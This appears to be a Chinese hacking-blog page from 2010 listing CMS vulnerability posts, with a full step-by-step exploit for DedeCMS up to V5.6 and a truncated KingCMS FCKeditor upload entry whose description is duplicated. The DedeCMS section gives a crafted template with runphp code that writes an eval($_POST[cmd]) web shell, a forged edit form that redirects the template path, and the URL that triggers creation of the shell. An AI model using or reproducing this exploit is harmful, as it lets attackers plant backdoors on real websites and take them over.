dvbbs php2.0 joinvipgroup.php注入0day
作者:admin 日期:2010-09-02
DEDECMS网站管理系统Get Shell漏洞
作者:admin 日期:2010-09-02
Dedecms <= V5.6 Final模板执行漏洞
作者:admin 日期:2010-09-02
1.上传一个模板文件:注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:uploads/userup/2/12OMX04-15A.jpg模板内容是(如果限制图片格式,加gif89a):{dede:name runphp=''yes''}$fp = @fopen("1.php", ''a'');@fwrite($fp, ''<''.''?php''."\r\n\r\n".''eval($_POST[cmd])''."\r\n\r\n?".">\r\n");@fclose($fp);{/dede:name}2.修改刚刚发表的文章,查看源文件,构造一个表单:<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data" onsubmit="return checkSubmit();"><input type="hidden" name="dopost" value="save" /><input type="hidden" name="aid" value="2" /><input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /><input type="hidden" name="channelid" value="1" /><input type="hidden" name="oldlitpic" value="" /><input type="hidden" name="sortrank" value="1275972263" /><div id="mainCp"><h3 class="meTitle"><strong>修改文章</strong></h3><div class="postForm"><label>标题:</label><input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/><label>标签TAG:</label><input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)<label>作者:</label><input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/><label>隶属栏目:</label><select name=''typeid'' size=''1''><option value=''1'' class=''option3'' selected=''''>测试栏目</option></select> <span style="color:#F00">*</span>(不能选择带颜色的分类)<label>我的分类:</label><select name=''mtypesid'' size=''1''><option value=''0'' selected>请选择分类...</option><option value=''1'' class=''option3'' selected>hahahha</option></select><label>信息摘要:</label><textarea name="description" id="description">1111111</textarea>(内容的简要说明)<label>缩略图:</label><input name="litpic" type="file" id="litpic" onchange="SeePicNew(''divpicview'',this);" maxlength="100" class="intxt"/><input type=''text'' name=''templet''value="../ uploads/userup/2/12OMX04-15A.jpg"><input type=''text'' name=''dede_addonfields''value="templet,htmltext;">(这里构造)</div><!-- 表单操作区域 --><h3 class="meTitle">详细内容</h3><div class="contentShow postForm"><input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe><label>验证码:</label><input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style=''width:50px;text-transform:uppercase;'' /><img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" onclick="this.src=this.src+''?''" /><button class="button2" type="submit">提交</button><button class="button2 ml10" type="reset" onclick="location.reload();">重置</button></div></div></form>提交,提示修改成功,则我们已经成功修改模板路径。3.访问修改的文章:假设刚刚修改的文章的aid为2,则我们只需要访问:http://127.0.0.1/dede/plus/view.php?aid=2即可以在plus目录下生成webshell:1.php
KingCMS ASP 5.0/5.1 Fck编程器上传漏洞
作者:admin 日期:2010-09-02
影响版本:KingCMS ASP 5.0/5.1
官方地址:http://www.kingcms.com/
漏洞描述: KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统,前台全部静态化处理,新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力,现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点,特别是针对比较懒的站长。
漏洞算不上0day,但是却具有0day的危害效果,主要是因管理为对后台路径和编辑器路径做更改,系统是使用FCKeditor编辑器,这个编辑器的漏洞大家都比较熟悉了,下面就给出具体利用方法。
官方地址:http://www.kingcms.com/
漏洞描述: KingCMS ASP是基于ASP+ACCESS构架的一款很不错的CMS系统,前台全部静态化处理,新一代 KingCMS 提供了更好的界面、更多的开发余地、更强大的扩展能力,现今也受到不少站长的欢迎。但是在没有正确设置系统的情况下会爆出一个致命的弱点,特别是针对比较懒的站长。
漏洞算不上0day,但是却具有0day的危害效果,主要是因管理为对后台路径和编辑器路径做更改,系统是使用FCKeditor编辑器,这个编辑器的漏洞大家都比较熟悉了,下面就给出具体利用方法。
